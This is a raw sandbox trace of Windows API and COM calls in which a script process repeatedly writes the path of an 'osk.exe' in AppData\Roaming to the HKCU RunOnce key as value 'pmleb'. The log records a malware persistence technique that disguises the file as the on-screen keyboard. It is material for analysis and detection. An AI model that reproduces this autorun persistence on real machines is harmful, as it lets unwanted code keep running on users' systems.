[1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0091.984] 
FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0091.984] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0091.985] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0091.985] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0091.985] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0091.985] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0091.985] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x65 [0091.985] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0091.985] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x66 [0091.985] 
FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0091.986] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x65 [0091.986] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.986] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0091.986] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.986] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.986] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0091.986] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0091.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0091.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0091.986] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0091.986] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0091.987] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0091.987] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0091.987] RegCloseKey (hKey=0x280) returned 0x0 [0091.987] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.987] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.987] SetTimer (hWnd=0x20280, nIDEvent=0x21e1, uElapse=0xa, lpTimerFunc=0x0) returned 0x21e1 [0091.987] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0091.999] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0091.999] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0091.999] KillTimer (hWnd=0x20280, uIDEvent=0x21e1) returned 1 [0091.999] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.999] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.000] IUnknown:Release (This=0x787518) returned 0x1 [0092.000] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 
[7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.000] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.000] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.000] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.000] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.000] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.000] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, 
riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.000] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.000] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.000] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x66 [0092.001] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.001] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x67 [0092.001] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), 
pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.002] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x66 [0092.002] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.002] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.002] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.002] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.002] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.002] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.002] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.002] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.002] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.002] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | 
out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.003] RegCloseKey (hKey=0x280) returned 0x0 [0092.003] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.003] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.003] SetTimer (hWnd=0x20280, nIDEvent=0x21e2, uElapse=0xa, lpTimerFunc=0x0) returned 0x21e2 [0092.003] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.014] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.014] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.014] KillTimer (hWnd=0x20280, uIDEvent=0x21e2) returned 1 [0092.015] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.015] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.015] IUnknown:Release (This=0x787518) returned 0x1 [0092.015] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.015] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.015] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, 
wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.015] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.015] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.016] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.016] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.016] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.016] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.016] 
FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x67 [0092.016] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.016] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x68 [0092.016] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.017] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x67 [0092.017] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.017] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.017] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.017] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.017] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.017] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, 
lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.017] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.017] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.018] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.018] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.018] RegCloseKey (hKey=0x280) returned 0x0 [0092.018] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.018] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.018] SetTimer (hWnd=0x20280, nIDEvent=0x21e3, uElapse=0xa, lpTimerFunc=0x0) returned 0x21e3 [0092.018] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.030] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.030] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.030] KillTimer (hWnd=0x20280, uIDEvent=0x21e3) returned 1 [0092.030] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.030] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, 
Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.031] IUnknown:Release (This=0x787518) returned 0x1 [0092.031] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.031] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.031] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.031] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.031] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 
